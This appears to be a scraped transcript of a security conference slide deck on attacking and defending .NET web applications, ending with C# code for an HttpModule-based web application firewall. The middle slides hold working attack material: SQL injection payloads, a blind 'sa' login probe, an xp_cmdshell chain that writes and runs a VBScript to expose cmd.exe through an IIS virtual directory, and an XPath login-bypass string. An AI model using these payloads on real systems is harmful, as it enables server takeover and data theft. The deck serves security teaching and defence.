Search

Hacking and Securing .NET Apps (Infosecworld)

Loading...

Flash Player 9 (or above) is needed to view presentations.
We have detected that you do not have it on your computer. To install it, go here.

0 comments

Post a comment

    Post a comment
    Embed Video
    Edit your comment Cancel

    Notes on slide 1

    5 Favorites

    Hacking and Securing .NET Apps (Infosecworld) - Presentation Transcript

    1. Session H4 Hacking and Securing .NET
    2. Introduction Founder & Director G Net Square (Brief) – Past experience G Chase, IBM & Foundstone – Interest G Web security research – Published G Advisories, Tools, Papers etc. – Book G Web Hacking – http://shreeraj.blogspot.com shreeraj@net-square.com Shreeraj Shah
    3. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    4. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    5. Industry WEB 2.0 & Rich internet Applications G are on the rise Web Services framework is picking G up. Web services would rocket from $1.6 G billion in 2004 to $34 billion by 2007. [IDC] Application layer is becoming critical G for business success. Messaging mechanisms are G changing. Shreeraj Shah
    6. Industry Sample new applications G www.live.com – www.netvibes.com – www.writely.com – www.start.com – Etc… – Shreeraj Shah
    7. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    8. Infrastructure Evolution - 1 Internet router intranet www mail Database 9 Shreeraj Shah
    9. Infrastructure Evolution - 2 Other Offices Internet Exchange DMZ Dial-up router intranet VPN www mail Database RAS Shreeraj Shah
    10. Infrastructure Evolution - 3 Other Offices Internet Exchange firewall DMZ Dial-up router intranet VPN www mail Database RAS Shreeraj Shah
    11. Defense posture and Evolution Web Services Business Application Level Application Level Web/customized etc.. Services Level Traditional Attacks Brute force IIS web/SMTP/POP etc.. RPC buffer overflow Null session Etc.. Operating System Level ipc$/wu-ftpd/sunrpc etc.. 12 Shreeraj Shah
    12. Defense posture and Evolution Firewall VPN IDS Auth Server Etc… Web Services Business Application Level Application Level Web/customized etc.. Services Level X IIS web/SMTP/POP etc.. Traditional Attacks X Brute force RPC buffer overflow Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. 13 Shreeraj Shah
    13. Defense posture and Evolution Firewall VPN IDS Auth Server Web Services Etc… Business Application Level Application Level Next Generation Web/customized etc.. Attacks SQL injection Parameter tempering Services Level Etc.. X IIS web/SMTP/POP etc.. Brute force X RPC buffer overflow Null session Operating System Level X Etc.. ipc$/wu-ftpd/sunrpc etc.. Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ 14 Ports/Registries etc… Shreeraj Shah
    14. Defense posture and Evolution Application Layer Content Filtering Firewall Web Services Business Application Level Application Level Web/customized etc.. Next Generation Attacks SQL injection Parameter tempering Services Level X Etc.. IIS web/SMTP/POP etc.. Brute force RPC buffer overflow X Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. Firewall Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ 15 Ports/Registries etc… Shreeraj Shah
    15. Defense posture and Evolution Application Layer Firewall Web Services Business Application Level Web Services Attacks Application Level Web/customized etc.. Next Generation Attacks SQL injection Parameter tempering Services Level X Etc.. IIS web/SMTP/POP etc.. Brute force RPC buffer overflow X Operating System Level Null session X Etc.. ipc$/wu-ftpd/sunrpc etc.. Firewall Added Defense Accounts/Shares/Patches/updates/Logging/Auditing/ 16 Ports/Registries etc… Shreeraj Shah
    16. Defense posture Runtime Platform Services and Services and Components Components Partner Application Customer Layer Logic User 1. Presentation Supplier 2. Business 3. Data Access Hacker Prospect Host Security Employee Operating System Network Security Routers Firewalls Switches 17 Shreeraj Shah
    17. Evolution of Web applications Internet DMZ Scripted Web Web Web Server Engine Client Static pages only Dynamic pages ASP HTML,HTM etc.. DHTML,PHP,CGI Etc.. DB 18 Internal/Corporate Shreeraj Shah
    18. Evolution of Web applications Internet DMZ Trusted Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages only Dynamic pages ASP Coldfusion HTML,HTM etc.. DHTML,PHP,CGI Etc.. Etc.. X DB 19 Internal/Corporate Shreeraj Shah
    19. Evolution of Web applications Internet DMZ Trusted Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 20 Internal/Corporate Shreeraj Shah
    20. Evolution of Web applications Internet DMZ Trusted Application Scripted Web Servers Web Web Server And Engine Client Static pages Dynamic pages Integrated HTML,HTM etc.. ASP DHTML, Framework PHP,CGI Etc.. ASP.NET with X .Net J2EE App Server Web Services Etc.. DB 21 Internal/Corporate Shreeraj Shah
    21. Evolution of Web applications Internet DMZ Trusted SOAP Web Service W Client E Application Scripted B Web Servers Web S Server And Engine E Static pages Dynamic pages Web Integrated R HTML,HTM etc.. ASP DHTML, V Client Framework PHP,CGI Etc.. I ASP.NET with C X .Net E J2EE App S Server Web Services Etc.. DB 22 Internal/Corporate Shreeraj Shah
    22. Technologies Web Services is forming back end and G accessible on SOAP AJAX – empowering browsers G XML based services G Rich Internet Applications are consuming G back end web services Search engines and mechanisms for web G services publishing and accessing Security evolving around web services G Shreeraj Shah
    23. Technologies Simple GET/POST Simple AJAX HTTP resource Web Calls Web Services Server resource Web Services Client Start.com DEMO Shreeraj Shah
    24. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    25. Security! 95% companies were hacked from web G applications and 5% of them were aware of them – FBI/CSI Most popular attacks are against web G server – incident.org 3 out of 4 web sites are vulnerable to G attack (Gartner) 75% hacks occurs at application level G (Gartner) Every 1500 lines of code has one security G vulnerability (IBM Labs) 2000 attacks / week for unprotected web G site Shreeraj Shah
    26. Security! Over 80% 100 of all malicious attacks 80 “target port 80.” 60 - Network world 40 20 Services web server SQL Cross-site Buffer Cookie others Parameter vulnerabilities vulnerabilities injection scripting overflows poisoning Tampering Shreeraj Shah
    27. Security! CSI Security Survey : Vulnerability Distribution misconfiguration, other problems 36% programming errors 64% misconfiguration, other problems programming errors Shreeraj Shah
    28. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    29. Defining Methods Black Box Method: Analyzing application with an G attacker’s perspective. Seeing the web resources available to common user – like just to see 80 and 443. White Box Method: Analyzing application with full G knowledge and access. Access to deployment setup, Source code and other resources which are on the box. Shreeraj Shah
    30. Traditional - Application Internet Internal Application Phase 1 Systems Systems Vulnerability Vulnerability Vulnerability Assessment Assessment Assessment Security Architecture review Code / app Phase 2 review Internet Internal App / DB Systems Systems audit Audit Audit Phase 3 Internet Internal App / DB Systems Systems re-code / lock-down lock-down lock-down Continuous Security Monitoring and Assessment Phase 4 Shreeraj Shah
    31. Analysis Cycle Deployment Analysis (White Box Approach) Application Analysis (Black Box Approach) Attacks Identification Web (Black Box Approach) Application Asset – Attacks Mapping Defense Strategies (White Box Approach) 44 Shreeraj Shah
    32. Methodology Footprinting Discovery Profiling Manual Attacks Auto Attacks Exploit 45 Defense Shreeraj Shah
    33. Footprinting & Discovery Footpritning & Discovery G “Host” is essential – IP/Port combination is not enough – Old approaches G whois & PTR – May not work – New approaches G Search engines – Advanced whois database – Shreeraj Shah
    34. Information Exposure Multi-hosted scenario G <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs/blue ServerName www.blue.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> <VirtualHost *:80> # ServerAdmin webmaster@dummy-host.example.com DocumentRoot /usr/local/apache2/htdocs/red ServerName www.red.com # ErrorLog logs/dummy-host.example.com-error_log # CustomLog logs/dummy-host.example.com-access_log common </VirtualHost> Shreeraj Shah
    35. Information Exposure C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:40 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Content-Location: index.html.en Vary: negotiate,accept-language,accept-charset TCN: choice Last-Modified: Fri, 04 May 2001 00:01:18 GMT ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00" Accept-Ranges: bytes Content-Length: 1456 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en Expires: Tue, 11 Jan 2005 20:17:40 GMT Shreeraj Shah
    36. Information Exposure C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 Host: www.blue.com HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:45 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Last-Modified: Tue, 04 Jan 2005 23:10:29 GMT ETag: "1865-b-f991a340" Accept-Ranges: bytes Content-Length: 11 Connection: close Content-Type: text/html; charset=ISO-8859-1 Shreeraj Shah
    37. Information Exposure C:Documents and SettingsAdministrator> nc 203.88.128.10 80 HEAD / HTTP/1.0 Host: www.red.com HTTP/1.1 200 OK Date: Tue, 11 Jan 2005 20:17:57 GMT Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4 Last-Modified: Tue, 04 Jan 2005 23:16:57 GMT ETag: "1cc0b-9-10b20c40" Accept-Ranges: bytes Content-Length: 9 Connection: close Content-Type: text/html; charset=ISO-8859-1 Shreeraj Shah
    38. Information Exposure C:Program FilesGnuWin32in>jwhois -h whois.arin.net 203.88.128.10 [Querying whois.arin.net] [whois.arin.net] OrgName: XYZ corp OrgID: XYZC Address: 101 First Avenue City: NYC StateProv: NY PostalCode: 94089 Country: US NetRange: 203.88.128.0 – 203.88.128.255 CIDR: 203.88.128.0/20 NetName: XYZC-4 NetHandle: NET-203-88-128-0-1 Parent: NET-203-0-0-0-0 NetType: Direct Allocation NameServer: ns1.xyz.com NameServer: ns2.xyz.com Comment: RegDate: 2003-07-17 Updated: 2003-07-17 OrgTechHandle: NA098-ARIN OrgTechName: Netblock Admin OrgTechPhone: +1-212-999-9999 OrgTechEmail: netblockadmin@xyz.com # ARIN WHOIS database, last updated 2005-01-10 19:10 # Enter ? for additional hints on searching ARIN's WHOIS database. Shreeraj Shah C:Program FilesGnuWin32in>
    39. Information Exposure C:Documents and SettingsAdministrator>nslookup Default Server: ns1.icenet.net Address: 203.88.128.7 > server ns1.xyz.com Default Server: [203.88.128.250] Address: 203.88.128.250 > 203.88.128.10 Server: [203.88.128.250] Address: 203.88.128.250 Name: www.blue.com Bingo! Address: 192.168.7.50 > set type=PTR > 203.88.128.10 Server: [203.88.128.250] Address: 203.88.128.250 10.128.88.203.in-addr.arpa name = www.blue.com 10.128.88.203.in-addr.arpa name = www.red.com > Shreeraj Shah
    40. Information Exposure C:Documents and SettingsAdministrator>nslookup Default Server: ns1.icenet.net Address: 203.88.128.7 > server 203.88.128.250 Default Server: icedns1.icenet.net Address: 203.88.128.250 > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Name: ice.128.client11.icenet.net Sucks! Address: 203.88.128.11 > set type=PTR > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Non-authoritative answer: 11.128.88.203.in-addr.arpa name = ice.128.client11.icenet.net > 203.88.128.11 Server: icedns1.icenet.net Address: 203.88.128.250 Non-authoritative answer: 11.128.88.203.in-addr.arpa name = ice.128.client11.icenet.net Shreeraj Shah
    41. Information Exposure http://whois.webhosting.info/IP Bingo! www.whois.sc Shreeraj Shah
    42. Search Engine Kung-Fu Domain & Cross Domain footprinting G MSN & Google can help G “Site:” – Domain harvesting – “link:” (Google) & “linkdomain:” (MSN) – – Cross Domain harvesting “inurl:” – Filtering – “IP:” (MSN) – Host footprinting – Advanced methods of footprinting G MSNPawn tool G http://net-square.com/msnpawn – DEMO Shreeraj Shah
    43. Profile Profiling web application is very G important task to identify possible attacks. AJAX and web services calls G Objective is to find from where we G get cookie?, where are the forms?, It has applet or objects?, Querystrings are around or not? And such. Regex can be used on HTML code to G fetch these info. Shreeraj Shah
    44. Sample Profile URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X / /cart.aspx X /include/styles.css X /privacy.aspx X /catalog.aspx /aboutus.aspx X X /details.aspx?id=1 X X /details.aspx?id=2 X X /details.aspx?id=3 /rebates.aspx X X /catalog.aspx?start=3 X X /rebates.aspx?loc=beckham.html X X /rebates.aspx?loc=zhivago.html X X X X /orderapp/default.aspx?login=yes X /orderapp/include/styles.css X X /rebates.aspx?loc=monsoon.html X /details.aspx?id=4 X X X /rebates.aspx?loc=lawrence.html /details.aspx?id=5 X X X /details.aspx?id=6 X DEMO X /catalog.aspx?start=6 X Shreeraj Shah
    45. Web Application Assets Each identified attribute can have G vulnerability. Vulnerability can be exploited by G hacker. Forms and Query string are major G source of exploitation. Other parameters like cookie, scripts G (client side java, vb etc.) and path info (include, cgi-bin, servlet etc.) expose business level information. Shreeraj Shah
    46. Once again public domain usage We can fetch this info from public domain G like Google – “site:” G We can fetch technology clues using “inurl” or “filetype” G One can fetch “cache” information from google and can profile them as well. G Can be fetched from www.archive.org http://web.archive.org/web/*www.google.com * DEMO Shreeraj Shah
    47. Search Engine Kung-Fu Profiling & fetching list of URLs G “site:” – Advantage : Passive & One shot – harvesting Technology identification from G search engine. Vulnerability and resource leakage G analysis from engine MSNPawn for MSN hacking – Google hacking tools – DEMO Shreeraj Shah
    48. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    49. Deployment Attack Points Configuration Backup files Reverse Permission Config files Proxy Ext. Mapping Dir Browsing Common files (Web Integration files Hidden web paths Server) WEB-INF etc. Cross side trace Scripted Application Web Web Web Servers Server Engine Client .NET Static pages Dynamic pages WebLogic HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. Roles DB Extended SPs DEMO 50 Internal/Corporate Shreeraj Shah
    50. Deployment Analysis for .Net Scanning *.config files G Mapping understanding G Directory browsing and other G permission checks Metadata can help in automated G scanning on .Net DEMO Code Walk Shreeraj Shah
    51. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net Application (Controls) Attacks .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    52. Exposure to asset Security Vulnerability Controls and Policies Exploit Attack Tools X Agents Asset Technique Goals X & Methods Motives Exploit Poor Control 93 Shreeraj Shah
    53. Impact Trail – Form / Query String Internet DMZ Trusted Client side processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB 94 Internal/Corporate Shreeraj Shah
    54. Impact Trail – Form / Query String c: ools>nc <HOST> 80 Internet DMZ Trusted GET /account.aspx?id=5 HTTP/1.0 … … Client side processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB 95 Internal/Corporate Shreeraj Shah
    55. Impact Trail – Form / Query String c: ools>nc <HOST> 80 Internet DMZ Trusted POST /account.aspx HTTP/1.0 … … Client side Id=5&customer=6 processing Parameter Variable Processing Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Query Beans Processing Etc.. DB 96 Internal/Corporate Shreeraj Shah
    56. Impact Trail – Comments / Email Internet DMZ Trusted Information Usage Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 97 Internal/Corporate Shreeraj Shah
    57. Impact Trail – Comments / Email ….. <a HREF=“mailto:admin@example.com>... Internet DMZ Trusted …. < - - code in db,inc changed 12/12/2002 by John -!> …. Information Usage Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 98 Internal/Corporate Shreeraj Shah
    58. Impact Trail – Applet / Object Internet DMZ Trusted Client Side Processing Data Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 99 Internal/Corporate Shreeraj Shah
    59. Impact Trail – Applet / Object ….. <applet codebase=./code/> … </applet> Internet DMZ Trusted …. <object classid= 5672….></object> Client Side Processing Data Processing Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB 100 Internal/Corporate Shreeraj Shah
    60. Impact Trail – Cookie HTTP/1.x 200 OK …. Internet Set-Cookie: DMZ Trusted ASPSESSIONIDCSSBBRQR=MKELONCBPANNHEKHCFGABJGB; CID=1 Session Client Side Session Decision Session usage Management Session Cookie Application Cookie Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Beans Etc.. DB Transport Layer State 101 Internal/Corporate Shreeraj Shah
    61. Impact Trail – Authentication Internet DMZ Trusted Client side Control ACL ACL based Processing Decisions Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Data Access Beans based on ACL Etc.. DB 102 Internal/Corporate Shreeraj Shah
    62. Impact Trail – Authentication Form based (user/pass) Internet DMZ Trusted NTLM/BASIC/DIGEST etc… Client side Control ACL ACL based Processing Decisions Scripted Application Web Web Web Servers Server Engine Client WebLogic, Static pages Dynamic pages Coldfusion HTML,HTM etc.. ASP DHTML, Etc.. PHP,CGI Etc.. Middle layer X Components COM Data Access Beans based on ACL Etc.. DB 103 Internal/Corporate Shreeraj Shah
    63. Asset – Impact Observations Logic Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr Presentation X X X X X X X X X X X X Business X X X X X X Data Access 105 Shreeraj Shah
    64. Asset to Attack Mapping URL (Asset) Form Cmnt Email Applet Object Cookie Auth. Path Script QryStr X X Input Validation X Authorization X X X X X Parameter Tempering X Authentication X X Brute Forcing X X X Session Management X X X SQL Manipulation X X File Operations X X X Information Leakage Error/Exception management X X X X X X Client Side Manipulation X X X Java Decompile Cryptography X X Buffer Overflows X X X X Remote Command Execution 106 Shreeraj Shah
    65. Source Code Disclosure Ability to retrieve application files in G an unparsed manner. Attackers can recover the source G code of the web application itself. The code can then be used to find G further loopholes / trophies. May be caused by many ways: G Misconfiguration or vendor errors – Poor application design, etc. – 108 Shreeraj Shah
    66. Input Validation Root cause of most web hacks. G All inputs received should be G validated: data types – data ranges (e.g. -ve or fractional – numbers) buffer sizes and bounds – metacharacters – Tampering with hidden fields. G Bypassing client side checking (e.g. G javascript). 111 Shreeraj Shah
    67. Data types and HTTP In HTTP, everything is a string. G Assign data types for each G parameter Basic data types: G integer, string, date, floating point, – etc. Complex data types: G file path, session identifier, – credentials, etc. 112 Shreeraj Shah
    68. SQL Query Poisoning Parameters from the URL or input G fields get used in SQL queries. An instance of Input Validation G attacks. Data can be altered to extend the G SQL query. http://server/query.asp?item=3+OR +1=1 Execution of stored procedures. G May even lead to back-end database G server compromise. 117 Shreeraj Shah
    69. Force SQL errors Insert meta-characters around or G within the parameters. Range testing - BOF or EOF. G Changing the data type. G Premature query termination: G quotation marks - ‘ or “ – trailing hyphens -- – Look for error messages generated G from the database. 119 Shreeraj Shah
    70. Identifying SQL errors Try and force error messages from G database servers. Gives us an idea how the SQL query G is being created and used. Tamper the input parameter. G Change data type – Premature termination by ‘ “ etc… – If the SQL query fails, we have a G candidate for SQL injection. 122 Shreeraj Shah
    71. Identifying SQL errors Identify which resources contain SQL G interfaces. Identify the offending parameters G which cause the SQL queries to break. Root cause of all SQL query G poisoning is lack of input sanitization. Strip off meta-characters. G 123 Shreeraj Shah
    72. Extend SQL queries Add valid SQL clauses to extend the G SQL query. “OR 1=1” G return all rows. – “;SELECT …” G multiple queries. – “;EXEC …” G stored procedures. – 126 Shreeraj Shah
    73. Executing Stored Procedures SQL Injection attacks can be G extended beyond excessive data retrieval. Stored procedures, if known, and G accessible, can also be invoked. For example Microsoft SQL – Server’s extended stored procedures. Use the SQL “EXEC” statement. G 129 Shreeraj Shah
    74. SQL Injection What if it is blind? G You don’t know web root – Firewall don’t allow outbound – traffic If you know web root – it is not – providing write rights. xp_cmdshell? - may or may not be – working. Is it running with “sa”? – Shreeraj Shah
    75. Making “sa” check… Querying process on SQL using SPs G (SELECT+ASCII(SUBSTRING((a.login G ame),1,1))+FROM+master..sysproce sses+AS+a+WHERE+a.spid+=+@@ SPID)=115 Final query would be “and” G ?id=1+AND+(SELECT+ASCII(SUBST G RING((a.loginame),1,1))+FROM+ma ster..sysprocesses+AS+a+WHERE+a .spid+=+@@SPID)=114 DEMO Shreeraj Shah
    76. Pulling “winnt” out… Echoing following lines blindly using G XP_CMDShell… Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo Shreeraj Shah
    77. Echoing… http://target/details.aspx?id=1;exec+mast G er..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:secret.vbs’ ….. And so on…. (All lines) Now run the vbscript G http://target/details.aspx?id=1;exec+mast er..xp_cmdshell+'cscript+c:secret.vbs’ G Check http://target/secret/system32/cmd.exe?+/c +set Bingo! DEMO Shreeraj Shah
    78. With metasploit… Shreeraj Shah
    79. XPATH Injection XPATH is a language defined to find G information from XML document. As XPATH name suggests it indeed uses G path to traverse through nodes of XML document and look for specific information from the document. XPATH provides expressions like slash (/), G double slash (//), dot(.), double dot (..), @, =, <, > etc. It helps in traversing through XML document. Shreeraj Shah
    80. XPATH – Vulnerable Code string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false Shreeraj Shah
    81. Attacking XPATH point //users[@username='"+user+"' and @password='"+pass+"']"; G XPATH parsing can be leveraged by passing G following string ' or 1=1 or ''=‘ This will always true on the first node and G user can get access as who ever is first user. //users[@username='' or 1=1 or ''='' and @password='any'] G Bingo! DEMO Shreeraj Shah
    82. Session Identifiers The hash key - “session identifier” G A Unique value for every session. G Passed back and forth between the G browser and the server. Implemented by a session cookie: G PHP PHPSESSID – ASP ASPSESSIONID – JSP jsessionid, etc. – 141 Shreeraj Shah
    83. Session Identifiers Non-Sequenceable: G Should not be serially – incremented. Cryptographically generated: G e.g. MD5(current time stamp + – random salt) Impossible to reverse-engineer. – It may be possible to change the G session cookie value… No way of guessing other session cookie values 142 Shreeraj Shah
    84. AJAX hacking AJAX – silent killer G Can fetch information from SSL site G Dynamic execution of the script G XML object – fetching information G DEMO Code Walk 142 Shreeraj Shah
    85. Source Code Review Analyzing source code G .NET – code analysis G Web application code review G What to look for? G How to grab right information? G Let’s see demo and tools G DEMO Code Walk Shreeraj Shah
    86. Binary audit .NET application binary analysis G Important step G Look for key security information G How to analyze binary? G What to look for? G Tools & Demo G DEMO Code Walk Shreeraj Shah
    87. Agenda .Net Application Attack points Assessment Tools & Methodology Auditing Defending .Net (Controls) .NET Security Industry Web Assets Issues Trends TCP – 80/443 Technologies Shreeraj Shah
    88. What is new in .Net? Web application has separate scope G and HTTP pipeline can be accessed. ISAPI had some limitations which are G not with HTTP interfaces. HTTP request can be accessed G before it hits application resources. HTTPModule and HTTPHandler are G defense at your gates. Can we build Web application G firewall and IDS – “YES” Shreeraj Shah
    89. Web Application without defense Internet DMZ Trusted Corporate Firewall IIS Web Application Web Client Resource.. Server DB Internal/Corporate Shah Shreeraj
    90. Web Application – Defense at gates Internet DMZ Trusted Web Corporate 1 Application Firewall Firewall IIS Web Application Web Client Resource.. Server 2 Web Application DB IDS Internal/Corporate Shah Shreeraj
    91. HTTP Stack for .Net Web Application Client Request Response IIS aspnet_isapi.dll HttpModule HttpModule HttpApplication HttpModule HttpHandler Web Application Resource Shreeraj Shah
    92. HTTP Stack for .Net HttpRuntime HttpApplicationFactory IHttpModule HttpApplication HttpContext HttpRequest HttpResponse HttpHandlerFactory IHttpHandler Handler Shreeraj Shah
    93. Leveraging HTTPModule and HTTPHandler - can G be leveraged. Application layer firewall can be G cooked up for your application. Similarly IDS for web application can G be developed. It sits in HTTP pipe and defend web G applications. Shreeraj Shah
    94. HTTP Stack for .Net HttpRuntime HttpApplicationFactory Web Application Firewall & IDS HttpApplication IHttpModule HttpHandlerFactory Handler Shreeraj Shah
    95. IHttpModule – Events Capturing events when HTTP request G arrives. Shreeraj Shah
    96. IHttpModule – Events Capturing events when HTTP response is G about to go. Shreeraj Shah
    97. IHttpModule – Events Pre send events G Shreeraj Shah
    98. Initializing using System; Extending Interface using System.Web; using System.Text.RegularExpressions; namespace webfirewall { public class webfirewall : IHttpModule { NOTE: The sample code shown here is written in C#. You must create a project as “Class Library” since you will be creating a .dll file that fits into the IIS HTTP processing chain or pipe. “System.Web” must be included as reference assembly to the project. The IHTTPModule interface resides in “System.Web”. Shreeraj Shah
    99. Regex Filtering capability Adding regex filtering for incoming requests and parameters public string[] setPattern(string doc,string pat,int num) { Regex exp = new Regex(@pat,RegexOptions.IgnoreCase); MatchCollection mc = exp.Matches(doc); string[] results = new string[mc.Count]; for (int i=0;i<mc.Count;i++) { Match FirstMatch = mc[i]; results[i] = FirstMatch.Groups[num].ToString(); } return results; } Shreeraj Shah
    100. Accessing HTTP stack • Creating Application stack instance • Capturing event for processing public void Init(HttpApplication httpApp) { httpApp.BeginRequest += new EventHandler(this.OnBeginRequest); Shreeraj Shah
    101. Accessing HTTP stack • Firewall and IDS rules for GET and POST requests string[] query,post; public void Init(HttpApplication App) { App.BeginRequest += new EventHandler(this. ProcessRequest); string inifile = Environment.CurrentDirectory + "\firewallrules\config.ini"; System.IO.StreamReader reader = new System.IO.StreamReader(inifile); string data = reader.ReadToEnd (); reader.Close(); string[] qres = setPattern(data,"<QUERY>(.*?)</QUERY>",1); query = new string[qres.Length]; query = qres; string[] pres = setPattern(data,"<POST>(.*?)</POST>",1); post = new string[pres.Length]; post = pres; } Shreeraj Shah
    102. Example GET & POST http://192.168.131.3/dvds4less/details.aspx?id=1 POST /dvds4less/checkout_form.aspx HTTP/1.1 Host: 192.168.131.3 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20040910 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0. 9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Attack points Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://192.168.131.3/dvds4less/cart.aspx?id=1&quantity=1 Cookie: ASP.NET_SessionId=0zrvzp45nzb1sj45piri0f55 Content-Type: application/x-www-form-urlencoded Content-Length: 60 product_id_0=1&quantity_0=1&order_num=513745&submit=Checkout Shreeraj Shah
    103. Trapping HTTP request • Using ProcessRequest we can trap incoming HTTP request. • Code for application defense can be plugged in there. public void ProcessRequest (object o, EventArgs ea) { HttpApplication app = (HttpApplication) o; Shreeraj Shah
    104. Processing Query String • Defending query string with Regex routine string querystring = app.Request.ServerVariables["QUERY_STRING"]; if(query.Length > 0) { for(int j=0;j<query.Length;j++) { string[] q = setPattern(querystring,query[j],0); if(q.Length>0) { app.Response.Write("Security Error"); app.Response.End(); } } } Shreeraj Shah
    105. Processing POST • Getting hook to POST request bytes. string postreq = ""; if(app.Request.ServerVariables["REQUEST_METHOD"] == "POST") { long streamLength = app.Request.InputStream.Length; byte[] contentBytes = new byte[streamLength]; app.Request.InputStream.Read(contentBytes, 0, (int)streamLength); postreq = System.Text.Encoding.UTF8.GetString(contentBytes); app.Request.InputStream.Position = 0; Shreeraj Shah
